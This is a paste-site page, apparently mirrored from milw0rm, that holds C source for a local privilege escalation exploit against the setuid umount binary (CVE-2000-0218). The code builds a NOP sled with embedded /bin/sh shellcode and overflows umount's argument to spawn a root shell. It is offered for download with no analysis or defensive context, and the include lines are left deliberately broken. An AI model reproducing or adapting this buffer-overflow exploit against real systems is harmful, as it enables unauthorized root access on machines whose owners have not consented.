BSD / Linux - 'umount' Local Privilege Escalation - CVE-2000-0218

SUBMITTED BY: FlyFar

DATE: May 16, 2024, 3:50 a.m.

FORMAT: C

SIZE: 1.4 kB

Raw Download

HITS: 451

Report
  1. /* Reminder - Be sure to fix the includes /str0ke */
  2. -------------------------------------- linux_umount_exploit.c ----------
  3. #include
  4. #include
  5. #include
  6. #include
  7. #include
  8. #include
  10. #define PATH_MOUNT "/bin/umount"
  11. #define BUFFER_SIZE 1024
  12. #define DEFAULT_OFFSET 50
  14. u_long get_esp()
  15. {
  16. __asm__("movl %esp, %eax");
  18. }
  20. main(int argc, char **argv)
  21. {
  22. u_char execshell[] =
  23. "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
  24. "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
  25. "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
  27. char *buff = NULL;
  28. unsigned long *addr_ptr = NULL;
  29. char *ptr = NULL;
  31. int i;
  32. int ofs = DEFAULT_OFFSET;
  34. buff = malloc(4096);
  35. if(!buff)
  36. {
  37. printf("can't allocate memory\n");
  38. exit(0);
  39. }
  40. ptr = buff;
  42. /* fill start of buffer with nops */
  44. memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
  45. ptr += BUFFER_SIZE-strlen(execshell);
  47. /* stick asm code into the buffer */
  49. for(i=0;i < strlen(execshell);i++)
  50. *(ptr++) = execshell[i];
  52. addr_ptr = (long *)ptr;
  53. for(i=0;i < (8/4);i++)
  54. *(addr_ptr++) = get_esp() + ofs;
  55. ptr = (char *)addr_ptr;
  56. *ptr = 0;
  58. (void)alarm((u_int)0);
  59. execl(PATH_MOUNT, "umount", buff, NULL);
  60. }
  63. // milw0rm.com [1996-08-13]
comments powered by Disqus